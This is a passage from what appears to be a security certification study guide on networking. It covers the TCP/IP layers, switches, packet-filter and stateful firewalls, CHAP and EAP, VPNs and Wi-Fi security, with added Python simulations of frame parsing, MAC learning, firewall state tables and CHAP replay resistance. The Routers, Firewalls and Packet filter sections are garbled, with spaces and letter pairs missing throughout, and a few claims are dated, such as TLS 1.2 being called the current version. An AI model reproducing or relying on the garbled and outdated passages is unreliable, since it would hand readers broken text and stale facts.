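    complemented. Over a header that already holds a correct checksum it is 0."""
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def port_class(port):
    """The guide lumps everything above 1023 together as ephemeral; IANA also
    separates registered (1024-49151) from dynamic/ephemeral (49152-65535)."""
    if port <= 1023:
        return "reserved"
    return "registered" if port <= 49151 else "ephemeral"


def build_frame(src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port, flags=0x02, ttl=64):
    """Encapsulate top-down: TCP segment inside IPv4 packet inside Ethernet frame."""
    segment = TCP.pack(src_port, dst_port, 0x1000, 0, 5 << 4, flags, 65535, 0, 0)
    header = IPV4.pack(0x45, 0, IPV4.size + len(segment), 0x1234, 0x4000, ttl,
                       PROTO_TCP, 0, ip_bytes(src_ip), ip_bytes(dst_ip))
    header = header[:10] + struct.pack("!H", ipv4_checksum(header)) + header[12:]
    return ETH.pack(mac_bytes(dst_mac), mac_bytes(src_mac), ETHERTYPE_IPV4) + header + segment


def parse_frame(frame):
    """Decapsulate bottom-up and return the fields each layer is responsible for."""
    if len(frame) < ETH.size + IPV4.size + TCP.size:
        raise ValueError("frame too short for Ethernet + IPv4 + TCP headers")
    dst_mac, src_mac, ethertype = ETH.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_IPV4:
        raise ValueError("not an IPv4 frame: EtherType 0x%04x" % ethertype)
    ver_ihl, _, total_len, _, _, ttl, proto, _, src_ip, dst_ip = IPV4.unpack_from(frame, ETH.size)
    ihl = (ver_ihl & 0x0F) * 4                       # header length in bytes
    ip_header = frame[ETH.size:ETH.size + ihl]
    if proto != PROTO_TCP:
        raise ValueError("not TCP: IP protocol %d" % proto)
    src_port, dst_port, seq, _, _, flags, window, _, _ = TCP.unpack_from(frame, ETH.size + ihl)
    return {
        # Layer 2 / Network Access: hardware addresses; the OUI is the first 24 bits
        "src_mac": mac_str(src_mac), "dst_mac": mac_str(dst_mac), "oui": mac_str(src_mac[:3]),
        # Layer 3 / Internet: logical addresses, TTL, header integrity
        "src_ip": ".".join(map(str, src_ip)), "dst_ip": ".".join(map(str, dst_ip)),
        "ttl": ttl, "ip_total_length": total_len, "ip_checksum_ok": ipv4_checksum(ip_header) == 0,
        # Layer 4 / Transport: ports name the application, flags drive the handshake
        "src_port": src_port, "dst_port": dst_port, "seq": seq, "window": window,
        "flags": [name for bit, name in TCP_FLAGS.items() if flags & bit],
        "src_port_class": port_class(src_port), "dst_port_class": port_class(dst_port),
    }


# Constructed sample: first packet of a handshake from a workstation to an SSH server.
SAMPLE_FRAME = build_frame("00:1a:2b:3c:4d:5e", "00:50:56:aa:bb:cc",
                           "192.168.2.4", "192.168.2.10", 51234, 22)

if __name__ == "__main__":
    for field, value in parse_frame(SAMPLE_FRAME).items():
        print(f"{field:18s} {value}")
```

Flip one byte of the IP header and ip_checksum_ok turns false, which is exactly the integrity check a router performs before forwarding; note that the TCP checksum (left at zero here) also covers the payload, while the IPv4 checksum covers only its own header.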
UDP

UDP is the User Datagram Protocol, a simpler and faster cousin to TCP. UDP
is commonly used for applications that are "lossy" (can handle some packet
loss), such as streaming audio and video. It is also used for query-response
applications, such as DNS queries.

ICMP

ICMP is the Internet Control Message Protocol, a helper protocol that helps
Layer 3. ICMP is used to troubleshoot and report error conditions: without
ICMP to help, IP would fail when faced with routing loops, ports, hosts, or
networks that are down, etc. ICMP has no concept of ports, as TCP and UDP
do, but instead uses types and codes.

Application-Layer TCP/IP protocols and concepts

A multitude of protocols exist at TCP/IP's Application Layer, which combines
the Presentation, Session, and Application Layers of the OSI model.

Telnet

Telnet provides terminal emulation over a network. Telnet servers listen on
TCP port 23. Telnet was the standard way to access an interactive command
shell over a network for over 20 years.
Telnet is weak because it provides no confidentiality: all data transmitted
during a Telnet session is plaintext, including the username and password
used to authenticate to the system.

FTP

FTP is the File Transfer Protocol, used to transfer files to and from servers.
Like Telnet, traditional FTP has no confidentiality or integrity and should not
be used to transfer sensitive data over insecure channels.

SSH

SSH was designed as a secure replacement for Telnet, FTP, and the UNIX "r"
commands (rlogin, rsh, etc.). It provides confidentiality, integrity, and
secure authentication, among other features. SSH can also be used to securely
tunnel other protocols, such as HTTP. SSH servers listen on TCP port 22 by
default.

SMTP, POP, and IMAP

SMTP is the Simple Mail Transfer Protocol, used to transfer email between
servers. SMTP servers listen on TCP port 25. POPv3 (Post Office Protocol) and
IMAP (Internet Message Access Protocol) are used for client-server email
access, and use TCP ports 110 and 143, respectively.

DNS

DNS is the Domain Name System, a distributed global hierarchical database
that translates names to IP addresses and vice versa. DNS uses both TCP and
UDP: small answers use UDP port 53; large answers (such as zone transfers)
use TCP port 53.

HTTP and HTTPS

HTTP is the Hypertext Transfer Protocol, which is used to transfer
unencrypted Web-based data. HTTPS (Hypertext Transfer Protocol Secure)
transfers encrypted Web-based data via SSL/TLS. HTTP uses TCP port 80,
and HTTPS uses TCP port 443. HTML (Hypertext Markup Language) is used
to display Web content.
LAN technologies and protocols

Local Area Network concepts focus on Layer 1-3 technologies such as
network cabling types, physical and logical network topologies, Ethernet,
FDDI, and others.

Ethernet

Ethernet operates at Layer 2 and is a dominant Local Area Networking
technology that transmits network data via frames. Ethernet is baseband (one
channel), so it must address issues such as collisions, where two nodes
attempt to transmit data simultaneously.

WAN technologies and protocols

ISPs and other long-haul network providers, whose networks span from
cities to countries, often use Wide Area Network technologies. Many of us
have hands-on experience configuring LAN technologies such as connecting
Cat5 network cabling; it is less common to have hands-on experience building
WANs.

T1s, T3s, E1s, and E3s

There are a number of international circuit standards: the most prevalent are
T-carriers (United States) and E-carriers (Europe).

Fast Facts
Here is a summary of common circuits:
- A T1 is a dedicated 1.544 megabit circuit that carries 24 64-kilobit DS0
  (Digital Signal 0) channels.
- A T3 is 28 bundled T1s, forming a 44.736 megabit circuit.
- An E1 is a dedicated 2.048 megabit circuit that carries 30 channels.
- An E3 is 16 bundled E1s, forming a 34.368 megabit circuit.

Frame Relay

Frame Relay is a packet-switched Layer 2 WAN protocol that provides no error
recovery and focuses on speed. Higher-layer protocols carried by Frame
Relay, such as TCP/IP, can be used to provide reliability.
Frame Relay multiplexes multiple logical connections over a single physical
connection to create Virtual Circuits; this shared-bandwidth model is an
alternative to dedicated circuits such as T1s. A PVC (Permanent Virtual
Circuit) is always connected, analogous to a real dedicated circuit like a T1. A
Switched Virtual Circuit (SVC) sets up each "call," transfers data, and
terminates the connection after an idle timeout.

MPLS

Multiprotocol Label Switching (MPLS) provides a way to forward WAN data
via labels, via a shared MPLS cloud network. Decisions are based on labels
and not encapsulated header data (such as an IP header). MPLS can carry
voice and data and be used to simplify WAN routing.

NETWORK DEVICES AND PROTOCOLS

Let us look at network devices ranging from Layer 1 hubs through
Application Layer Proxy firewalls that operate up to Layer 7. Many of these
network devices, such as routers, have protocols dedicated to their use, such
as routing protocols.

Repeaters and hubs

Repeaters and hubs are Layer 1 devices. A repeater receives bits on one port
and repeats them out the other port. The repeater has no understanding of
protocols; it simply repeats bits. Repeaters are often used to extend the length
of a network.
A hub is a repeater with more than two ports. It receives bits on one port and
repeats them across all other ports.

Bridges

Bridges and switches are Layer 2 devices. A bridge has two ports and connects
network segments together. Each segment typically has multiple nodes, and
the bridge learns the MAC addresses of nodes on either side. Traffic sent from
two nodes on the same side of the bridge will not be forwarded across the
bridge. Traffic sent from a node on one side of the bridge to the other side will
forward across. The bridge provides traffic isolation and makes forwarding
decisions by learning the MAC addresses of connected nodes. A bridge has
two collision domains.

Switches

A switch is a bridge with more than two ports. Also, it is best practice to only
connect one device per switch port. Otherwise, everything that is true about a
bridge is also true about a switch.
Figure 2.1 shows a network switch. The switch provides traffic isolation by
associating the MAC address of each computer and server with its port.

FIGURE 2.1 Network switch.

A switch shrinks the collision domain to a single port. You will normally have
no collisions assuming one device is connected per port (which is best
practice).
Trunks are used to connect multiple switches.
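The learning behaviour described for bridges and switches, as an added example that is not from the study guide: a LearningSwitch records which port each source MAC address arrived on, floods unknown and broadcast destinations, and drops frames whose destination sits on the port they came in on (the bridge's traffic isolation). The optional capacity argument is an assumption added here to show why the size of the MAC table matters: once the table cannot learn, the switch falls back to flooding, which is what a MAC-flooding attack exploits to sniff traffic it should never see.

```python
"""Added example (not from the study guide): a learning bridge/switch that
builds its MAC-address table from source addresses and forwards, floods or
drops frames accordingly. Ports, MAC addresses and hosts are made up.
"""
BROADCAST = "ff:ff:ff:ff:ff:ff"


class LearningSwitch:
    """A bridge is the two-port case; a switch is the same logic with more ports."""

    def __init__(self, ports, capacity=None):
        self.ports = set(ports)
        self.table = {}            # MAC address -> port it was last seen on
        self.capacity = capacity   # max table entries (None = unlimited); assumption for the demo

    def forward(self, in_port, src_mac, dst_mac):
        """Return the set of ports the frame is sent out of.

        1. Learn: the source MAC lives behind in_port (unless the table is full).
        2. Broadcast or unknown destination: flood to every port except in_port.
        3. Known destination on the same port: drop (traffic isolation).
        4. Otherwise forward out of the single learned port.
        """
        if in_port not in self.ports:
            raise ValueError(f"unknown port {in_port!r}")
        if src_mac in self.table or self.capacity is None or len(self.table) < self.capacity:
            self.table[src_mac] = in_port
        others = self.ports - {in_port}
        if dst_mac == BROADCAST or dst_mac not in self.table:
            return others
        out = self.table[dst_mac]
        return set() if out == in_port else {out}


def two_segment_bridge_demo():
    """Bridge with ports A and B: h1 and h2 share segment A, h3 is alone on B.
    Returns the forwarding decision for each frame, in order."""
    bridge = LearningSwitch(["A", "B"])
    h1, h2, h3 = "00:00:00:00:00:01", "00:00:00:00:00:02", "00:00:00:00:00:03"
    return [
        bridge.forward("A", h1, h3),   # h3 unknown yet: flooded to B
        bridge.forward("B", h3, h1),   # h1 learned on A: forwarded to A only
        bridge.forward("A", h1, h2),   # h2 unknown: flooded, even though h2 is on A
        bridge.forward("A", h2, h1),   # h2 learned on A; h1 is on A too: dropped
        bridge.forward("A", h1, h2),   # both on A: not forwarded across the bridge
    ]


if __name__ == "__main__":
    for step, decision in enumerate(two_segment_bridge_demo(), 1):
        print(f"frame {step}: forwarded to {sorted(decision) or 'nowhere'}")
```

The isolation the text promises only holds once both addresses have been learned; before that, and again whenever the table is full or an entry has aged out, a switch behaves like a hub for that frame.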
Routers

RoutersareLayer3devicesthatroutetracfromoneLANtoanother.IP
basedroutersmakeroutingdecisionsbasedonthesourceanddestinationIP
addresses.
Firewalls

Firewallsltertracbetweennetworks.TCP/IPpacketlterandstateful
rewallsmakedecisionsbasedonLayers3and4(IPaddressesandports).
ProxyrewallscanalsomakedecisionsbasedonLayers57.Firewallsare
multihomed:theyhavemultipleNICsconnectedtomultipledierent
networks.
Packet filter

Apacketlterisasimpleandfastrewall.Ithasnoconceptofstate:each
lteringdecisionmustbemadeonthebasisofasinglepacket.Thereisno
waytorefertopastpacketstomakecurrentdecisions.

ThepacketlteringrewallshowninFigure2.2allowsoutboundICMPecho
requestsandinboundICMPechoreplies.Computer1canping
bank.example.com.Theproblem:ana ackeratevil.example.comcansend
unsolicitedechoreplies,whichtherewallwillallow.

FIGURE2.2 Packetlterrewalldesign.

Stateful firewalls

Stateful firewalls have a state table that allows the firewall to compare current packets to previous ones. Stateful firewalls are slower than packet filters, but are far more secure.
Computer 1 sends an ICMP Echo Request to bank.example.com in Figure 2.3. The firewall is configured to allow ping to Internet sites, so the stateful firewall allows the traffic and adds an entry to its state table.

FIGURE 2.3 Stateful firewall design.

An Echo Reply is then received from bank.example.com to Computer 1 in Figure 2.3. The firewall checks to see if it allows this traffic (it does) and then checks the state table for a matching echo request in the opposite direction. The firewall finds the matching entry, deletes it from the state table, and passes the traffic.
Then evil.example.com sends an unsolicited ICMP echo reply. The stateful firewall, shown in Figure 2.3, sees no matching state table entry and denies the traffic.
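The packet filter of Figure 2.2 beside the stateful firewall of Figure 2.3, as an added Python example (not code from the book): the packet fields, hostnames and traffic sequence are constructed, and the ICMP identifier and sequence number stand in for whatever the real state table keys on.

```python
from dataclasses import dataclass

# ICMP type numbers (RFC 792)
ECHO_REPLY = 0
ECHO_REQUEST = 8


@dataclass(frozen=True)
class IcmpPacket:
    """The Layer 3/4 fields the firewall inspects. 'direction' is 'out'
    (LAN -> Internet) or 'in' (Internet -> LAN). Constructed for this example."""
    src: str
    dst: str
    icmp_type: int
    ident: int      # ICMP identifier
    seq: int        # ICMP sequence number
    direction: str


class PacketFilter:
    """Stateless rule set of Figure 2.2: outbound echo requests and inbound
    echo replies are allowed; every packet is judged on its own."""

    def check(self, pkt: IcmpPacket) -> str:
        if pkt.direction == "out" and pkt.icmp_type == ECHO_REQUEST:
            return "allow"
        if pkt.direction == "in" and pkt.icmp_type == ECHO_REPLY:
            return "allow"
        return "deny"


class StatefulFirewall(PacketFilter):
    """Same rules plus a state table (Figure 2.3): an inbound reply is passed
    only if a matching outbound request was seen, and the entry is then
    removed so the same reply cannot be accepted twice."""

    def __init__(self) -> None:
        self.state_table: set = set()

    def check(self, pkt: IcmpPacket) -> str:
        if super().check(pkt) == "deny":
            return "deny"                       # rule set rejects it outright
        if pkt.direction == "out":
            # Record the request as (requester, responder, id, seq)
            self.state_table.add((pkt.src, pkt.dst, pkt.ident, pkt.seq))
            return "allow"
        # Inbound reply: look for the request in the opposite direction
        key = (pkt.dst, pkt.src, pkt.ident, pkt.seq)
        if key in self.state_table:
            self.state_table.remove(key)
            return "allow"
        return "deny"                           # unsolicited reply


# Constructed traffic for the scenario in the text (hostnames stand in for IPs)
SCENARIO = [
    IcmpPacket("computer1", "bank.example.com", ECHO_REQUEST, 1, 1, "out"),
    IcmpPacket("bank.example.com", "computer1", ECHO_REPLY, 1, 1, "in"),
    IcmpPacket("evil.example.com", "computer1", ECHO_REPLY, 7, 7, "in"),
    # a second copy of bank's reply: no open request is left for it
    IcmpPacket("bank.example.com", "computer1", ECHO_REPLY, 1, 1, "in"),
]


def run_scenario(fw: PacketFilter) -> list:
    """Return the firewall's verdict for each packet in SCENARIO, in order."""
    return [fw.check(p) for p in SCENARIO]


if __name__ == "__main__":
    print("packet filter:", run_scenario(PacketFilter()))
    print("stateful     :", run_scenario(StatefulFirewall()))
```

The packet filter passes all four packets; the stateful firewall passes the request and the genuine reply, then denies both the unsolicited reply from evil.example.com and the duplicated reply, because the state entry was consumed.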
Proxy firewalls

Proxies are firewalls that act as intermediary servers. Both packet filter and stateful firewalls pass traffic through or deny it: they are another hop along the route. Proxies terminate connections.

Application-Layer Proxy firewalls

Application-Layer Proxy firewalls operate up to Layer 7. Unlike packet filter and stateful firewalls that make decisions based on Layers 3 and 4 only, Application-Layer proxies can make filtering decisions based on Application-Layer data, such as HTTP traffic, in addition to Layers 3 and 4.

Modem

A modem is a modulator/demodulator. It takes binary data and modulates it into analog sound that can be carried on phone networks designed to carry the human voice. The receiving modem then demodulates the analog sound back into binary data.

Intrusion Detection Systems and Intrusion Prevention Systems

An Intrusion Detection System (IDS) is a detective device designed to detect malicious (including policy-violating) actions. An Intrusion Prevention System (IPS) is a preventive device designed to prevent malicious actions. There are two basic types of IDSs and IPSs: network-based and host-based.

Endpoint security

Because endpoints are the targets of attacks, preventive and detective capabilities on the endpoints themselves provide a layer of defense beyond network-centric security devices.
Many point products can be considered part of an overall endpoint security suite. The most important are antivirus, application whitelisting, removable media controls, disk encryption, Host Intrusion Prevention Systems, and desktop firewalls.

Antivirus

The most commonly deployed endpoint security product is antivirus software. Antivirus is one layer (of many) of endpoint security defense in depth. Although antivirus vendors often employ heuristic or statistical methods for malware detection, the predominant means of detecting malware is still signature-based.
Signature-based approaches require that a malware specimen is available to the antivirus vendor for the creation of a signature. This is an example of blacklisting.

Application whitelisting

Application whitelisting is a more recent addition to endpoint security suites. The primary focus of application whitelisting is to determine in advance which binaries are considered safe to execute on a given system. Once this baseline has been established, any binary attempting to run that is not on the list of known good binaries is prevented from executing. A weakness of this approach is when a known good binary is exploited by an attacker and used maliciously.

Removable media controls

Another recent endpoint security product assists with removable media control. Malware delivery and data exfiltration have compelled organizations to exert stricter control over what type of removable media may be connected. Removable media control products are the technical control that matches administrative controls such as policy mandates against unauthorized use of removable media.

Disk encryption

Another endpoint security product found with increasing regularity is disk encryption software. Full Disk Encryption (FDE), also called whole disk encryption, encrypts an entire disk. This is superior to partially encrypted solutions, such as encrypted volumes, directories, folders, or files. The problem with the latter approach is the risk of leaving sensitive data on an unencrypted area of the disk.

SECURE COMMUNICATIONS

Protecting data in motion is one of the most complex challenges we face. The Internet provides cheap global communication with little or no built-in confidentiality, integrity, or availability.
Authentication protocols and frameworks

An authentication protocol authenticates an identity claim over the network. Good security design assumes that a network eavesdropper may sniff all packets sent between the client and authentication server: the protocol should remain secure. As we will see shortly, PAP fails this test, but CHAP and EAP pass.

PAP and CHAP

PAP (Password Authentication Protocol) is a very weak authentication protocol. It sends the username and password in cleartext. An attacker who is able to sniff the authentication process can launch a simple replay attack, by replaying the username and password, using them to log in. PAP is insecure and should not be used.
CHAP (Challenge-Handshake Authentication Protocol) is a more secure authentication protocol that does not expose the cleartext password and is not susceptible to replay attacks. CHAP relies on a shared secret: the password. The password is securely created (such as during account enrollment) and stored on the CHAP server. Since both the user and the CHAP server share a secret (the plaintext password), they can use that secret to securely authenticate.
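The CHAP exchange described above, as an added Python example (not code from the book): both sides compute MD5(Identifier || Secret || Challenge) as in RFC 1994, the server keeps the plaintext shared secret as the text notes, and the account name and password are constructed. The last function shows why a sniffed response is useless against a later handshake: the server issues a fresh random challenge each time.

```python
import hashlib
import hmac
import os


def chap_response(ident: int, secret: str, challenge: bytes) -> bytes:
    """CHAP response value: MD5(Identifier || Secret || Challenge), RFC 1994.
    Only this digest crosses the wire; the secret itself never does."""
    return hashlib.md5(bytes([ident]) + secret.encode() + challenge).digest()


class ChapServer:
    """Holds each user's plaintext shared secret (the CHAP server must) and
    issues a fresh, unpredictable challenge for every handshake."""

    def __init__(self, secrets: dict) -> None:
        self._secrets = secrets        # username -> shared secret (password)
        self._pending = {}             # identifier -> outstanding challenge
        self._next_id = 0

    def challenge(self) -> tuple:
        ident = self._next_id % 256    # the CHAP identifier is one octet
        self._next_id += 1
        chal = os.urandom(16)          # random, never reused
        self._pending[ident] = chal
        return ident, chal

    def verify(self, ident: int, username: str, response: bytes) -> bool:
        chal = self._pending.pop(ident, None)   # each challenge is usable once
        if chal is None or username not in self._secrets:
            return False
        expected = chap_response(ident, self._secrets[username], chal)
        return hmac.compare_digest(expected, response)


class ChapClient:
    def __init__(self, username: str, secret: str) -> None:
        self.username = username
        self.secret = secret

    def respond(self, ident: int, challenge: bytes) -> tuple:
        return self.username, chap_response(ident, self.secret, challenge)


def authenticate(server: ChapServer, client: ChapClient) -> tuple:
    """One handshake. Returns (success, wire_view): wire_view is everything an
    eavesdropper on the link would see: identifier, challenge, name, response."""
    ident, chal = server.challenge()                 # server -> client
    username, resp = client.respond(ident, chal)     # client -> server
    ok = server.verify(ident, username, resp)        # server decides
    return ok, (ident, chal, username, resp)


def replayed_response_accepted(server: ChapServer, wire_view: tuple) -> bool:
    """Feed a previously observed response into a new handshake. The server's
    new challenge differs, so the old digest no longer matches: returns False."""
    _ident, _chal, username, resp = wire_view
    new_ident, _new_chal = server.challenge()
    return server.verify(new_ident, username, resp)


if __name__ == "__main__":
    # Constructed test account; the secret is shared out of band at enrollment
    srv = ChapServer({"alice": "correct horse battery staple"})
    ok, seen = authenticate(srv, ChapClient("alice", "correct horse battery staple"))
    print("genuine handshake accepted:", ok)                          # True
    print("replayed response accepted:", replayed_response_accepted(srv, seen))  # False
```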
802.1X and EAP

802.1X is Port-Based Network Access Control and includes EAP (Extensible Authentication Protocol). EAP is an authentication framework that describes many specific authentication protocols. EAP is designed to provide authentication at Layer 2 (it is port-based, like ports on a switch), before a node receives an IP address. It is available for both wired and wireless, but is most commonly deployed on WLANs. An EAP client is called a supplicant, which requests authentication to a server called an authenticator.

Fast Facts

There are many types of EAP; we will focus on LEAP, EAP-TLS, EAP-TTLS, and PEAP.
LEAP (Lightweight Extensible Authentication Protocol) is a Cisco-proprietary protocol released before 802.1X was finalized. LEAP has significant security flaws and should not be used.
EAP-TLS (EAP-Transport Layer Security) uses PKI, requiring both server-side and client-side certificates. EAP-TLS establishes a secure TLS tunnel used for authentication. EAP-TLS is very secure due to the use of PKI, but is complex and costly for the same reason. The other major versions of EAP attempt to create the same TLS tunnel without requiring a client-side certificate.
EAP-TTLS (EAP-Tunneled Transport Layer Security), developed by Funk Software and Certicom, simplifies EAP-TLS by dropping the client-side certificate requirement, allowing other authentication methods (such as password) for client-side authentication. EAP-TTLS is thus easier to deploy than EAP-TLS, but less secure when omitting the client-side certificate.
PEAP (Protected EAP) was jointly developed by Cisco Systems, Microsoft, and RSA Security. It is similar to (and may be considered a competitor to) EAP-TTLS, including not requiring client-side certificates.

VPN

Virtual Private Networks (VPNs) secure data sent via insecure networks such as the Internet. The goal is to provide the privacy provided by a circuit such as a T1, virtually. The nuts and bolts of VPNs involve secure authentication, cryptographic hashes such as SHA-1 to provide integrity, and ciphers such as AES to provide confidentiality.

PPP

PPP (Point-to-Point Protocol) is a Layer 2 protocol that adds confidentiality, integrity, and authentication via point-to-point links. PPP supports synchronous links (such as T1s) in addition to asynchronous links such as modems.

IPsec

IPv4 has no built-in confidentiality; higher-layer protocols such as TLS are used to provide security. To address this lack of security at Layer 3, IPsec (Internet Protocol Security) was designed to provide confidentiality, integrity, and authentication via encryption for both IPv4 and IPv6. IPsec is a suite of protocols; the major two are Encapsulating Security Protocol (ESP) and Authentication Header (AH). Each has an IP protocol number: ESP is protocol 50; AH is protocol 51.

SSL and TLS

Secure Sockets Layer (SSL) was designed to protect HTTP (Hypertext Transfer Protocol) data: HTTPS uses TCP port 443. TLS (Transport Layer Security) is the latest version of SSL, equivalent to SSL version 3.1. The current version of TLS is 1.2.
Though initially Web-focused, SSL or TLS may be used to encrypt many types of data and can be used to tunnel other IP protocols to form VPN connections. SSL VPNs can be simpler than their IPsec equivalents: IPsec makes fundamental changes to IP networking, so installation of IPsec software changes the operating system (which requires superuser privileges). SSL client software does not require altering the operating system. Also, IPsec is difficult to firewall; SSL is much simpler.
VoIP

Voice over Internet Protocol (VoIP) carries voice via data networks. VoIP brings the advantages of packet-switched networks, such as lower cost and resiliency, to the telephone. With the advent of VoIP, many organizations have lowered costs by combining voice and data services on packet-switched networks.
Common VoIP protocols include Real-time Transport Protocol (RTP), designed to carry streaming audio and video. VoIP protocols carried by RTP include SIP (Session Initiation Protocol, a signaling protocol) and H.323. SRTP (Secure Real-time Transport Protocol) may be used to provide secure VoIP, including confidentiality, integrity, and secure authentication. SRTP uses AES for confidentiality and SHA-1 for integrity.
While VoIP can provide compelling cost advantages (especially for new sites, without a large legacy voice investment), there are security concerns. Many VoIP protocols, such as SIP, provide little or no security by default.

Wireless Local Area Networks

Wireless Local Area Networks (WLANs) transmit information via electromagnetic waves (such as radio) or light. Historically, wireless data networks have been very insecure, often relying on the (perceived) difficulty in attacking the confidentiality or integrity of the traffic. This perception is usually misplaced. The most common form of wireless data networking is the 802.11 wireless standard, and the first 802.11 standard with reasonable security is 802.11i.

FHSS, DSSS, and OFDM

Frequency Hopping Spread Spectrum (FHSS) and Direct Sequence Spread Spectrum (DSSS) are two methods for sending traffic via a radio band. Some bands, like the 2.4 GHz ISM band, can be quite polluted with interference: Bluetooth, some cordless phones, some 802.11 wireless, baby monitors, and even microwaves can broadcast or interfere with this band. Both DSSS and FHSS are designed to maximize throughput while minimizing the effects of interference.
DSSS uses the entire band at once, spreading the signal throughout the band. FHSS uses a number of small frequency channels throughout the band and hops through them in pseudorandom order.
Orthogonal Frequency-Division Multiplexing (OFDM) is a newer multiplexing method, allowing simultaneous transmission using multiple independent wireless frequencies that do not interfere with each other.

802.11 abgn

802.11 wireless has many standards, using various frequencies and speeds. The original mode is simply called 802.11 (sometimes 802.11-1997, based on the year it was created), which operated at 2 megabits per second (mbps) using the 2.4 GHz frequency; it was quickly supplanted by 802.11b, at 11 mbps. 802.11g was designed to be backward compatible with 802.11b devices, offering speeds up to 54 mbps using the 2.4 GHz frequency. 802.11a offers the same top speed, using the 5 GHz frequency.
802.11n uses both 2.4 and 5 GHz frequencies and is able to use multiple antennas with multiple-input multiple-output (MIMO). This allows speeds of 144 mbps and beyond. Table 2.3 summarizes the major types of 802.11 wireless.

Table 2.3
Types of 802.11 Wireless

WEP

WEP is the Wired Equivalent Privacy protocol, an early attempt (first ratified in 1999) to provide 802.11 wireless security. WEP has proven to be critically weak: new attacks can break any WEP key in minutes. Due to these attacks, WEP effectively provides little integrity or confidentiality protection: WEP is considered broken and its use is strongly discouraged. 802.11i and/or other encryption methods such as VPN should be used in place of WEP.

802.11i

802.11i is the first 802.11 wireless security standard that provides reasonable security. 802.11i describes a Robust Security Network (RSN), which allows pluggable authentication modules. RSN allows changes to cryptographic ciphers as new vulnerabilities are discovered.

Crunch Time

RSN is also known as WPA2 (Wi-Fi Protected Access 2), a full implementation of 802.11i. By default, WPA2 uses AES encryption to provide confidentiality and CCMP (Counter Mode CBC-MAC Protocol) to create a Message Integrity Check (MIC), which provides integrity. WPA2 may (optionally) use the less secure RC4 (Rivest Cipher 4) and TKIP (Temporal Key Integrity Protocol) ciphers to provide confidentiality and integrity, respectively.
The less secure WPA (without the 2) was designed for access points that lack the power to implement the full 802.11i standard, providing a better security alternative to WEP. WPA uses RC4 for confidentiality and TKIP for integrity. Usage of WPA2 is recommended over WPA.

Bluetooth

Bluetooth, described by IEEE standard 802.15, is a Personal Area Network (PAN) wireless technology, operating in the same 2.4 GHz frequency as many types of 802.11 wireless. Bluetooth can be used by small low-power devices such as cell phones to transmit data over short distances. Bluetooth versions 2.1 and older operate at 3 mbps or less; versions 3 and 4 offer far faster speeds.

RFID

Radio Frequency Identification (RFID) is a technology used to create wirelessly readable tags for animals or objects. There are three types of RFID tags: active, semi-passive, and passive. Active and semi-passive RFID tags have a battery; an active tag broadcasts a signal; semi-passive RFID tags rely on an RFID reader's signal for power. Passive RFID tags have no battery and also rely on the RFID reader's signal for power.

Remote access

In an age of telecommuting and the mobile workforce, secure remote access is a critical control. This includes connecting mobile users via methods such as DSL or Cable Modem, security mechanisms such as callback, and newer concerns such as instant messaging and remote meeting technology.

Remote desktop console access

Many users require remote access to computers' consoles. Naturally, some form of secure conduit like an IPsec VPN, SSH, or SSL tunnel should be used to ensure confidentiality of the connection, especially if the connection originates from outside the organization.
Two common modern protocols providing for remote access to a desktop are Virtual Network Computing (VNC), which typically runs on TCP 5900, and Remote Desktop Protocol (RDP), which typically runs on TCP port 3389. VNC and RDP allow for graphical access of remote systems, as opposed to the older terminal-based approach to remote access. RDP is a proprietary Microsoft protocol.
Increasingly, users are expecting easy access to a graphical desktop over the Internet that can be established quickly and from any number of personal devices. These expectations can prove difficult with traditional VNC and RDP-based approaches, which, for security purposes, are frequently tunneled over an encrypted channel such as a VPN.
A recent alternative to these approaches is to use a reverse tunnel, which allows a user who established an outbound encrypted tunnel to connect back in through the same tunnel. This usually requires a small agent installed on the user's computer that will initiate an outbound connection using HTTPS over TCP 443. This connection will terminate at a central server, which the user can connect to from outside the office in order to take control of their desktop machine.

Desktop and application virtualization

In addition to accessing standalone desktop systems remotely, another approach to providing remote access to computing resources is through desktop and application virtualization. Desktop virtualization is an approach that provides a centralized infrastructure that hosts a desktop image that can be remotely leveraged by the workforce. Desktop virtualization is often referred to as VDI.
As opposed to providing a full desktop environment, an organization can choose to simply virtualize key applications that will be served centrally. Like desktop virtualization, the centralized control associated with application virtualization allows the organization to employ strict access control and perhaps more quickly patch the application. Additionally, application virtualization can also be used to run legacy applications that would otherwise be unable to run on the systems employed by the workforce.

DSL

Digital Subscriber Line (DSL) is a last-mile solution that uses existing copper pairs to provide digital service to homes and small offices.
Common types of DSL are Symmetric Digital Subscriber Line (SDSL, with matching upload and download speeds), Asymmetric Digital Subscriber Line (ADSL, featuring faster download speeds than upload), and Very High Rate Digital Subscriber Line (VDSL, featuring much faster asymmetric speeds). Another option is HDSL (High-data-rate DSL), which matches SDSL speeds using two pairs of copper; HDSL is used to provide inexpensive T1 service.
As a general rule, the closer a site is to the Central Office (CO), the faster the available service.
Table 2.4 summarizes the speeds and modes of DSL.

Table 2.4
DSL Speed and Distances

DSL and Cable Modem Networks. http://www.ciscopress.com/articles/article.asp?p=31289 [accessed June 26, 2013].

Cable Modems

Cable Modems are used by cable TV providers to provide Internet access via broadband cable TV. Cable TV access is not ubiquitous, but is available in most large towns and cities in industrialized areas. Unlike DSL, Cable Modem bandwidth is typically shared with neighbors on the same network segment.

Instant messaging

Instant messaging allows two or more users to communicate with each other via real-time chat. Chat may be one-to-one or many-to-many via chat groups. In addition to chatting, most modern instant messaging software allows file sharing and sometimes audio and video conferencing.
An older instant messaging protocol is IRC (Internet Relay Chat), a global network of chat servers and clients created in 1988 and remaining very popular even today. Other chat protocols and networks include AOL Instant Messenger (AIM), ICQ (short for "I seek you"), and Extensible Messaging and Presence Protocol (XMPP) (formerly known as Jabber).
Chat software may be subject to various security issues, including remote exploitation, and must be patched like any other software. The file sharing capability of chat software may allow users to violate policy by distributing sensitive documents, and similar issues can be raised by the audio and video sharing capability of many of these programs.

Remote meeting technology

Remote meeting technology is a newer technology that allows users to conduct online meetings via the Internet, including desktop sharing functionality. These technologies usually include displaying PowerPoint slides on all PCs connected to a meeting, sharing documents such as spreadsheets, and also sharing audio or video.
Many of these solutions are designed to tunnel outbound SSL or TLS traffic, which can often pass via firewalls and any Web proxies. Usage of remote meeting technologies should be understood, controlled, and compliant with all applicable policy.

Summary of exam objectives

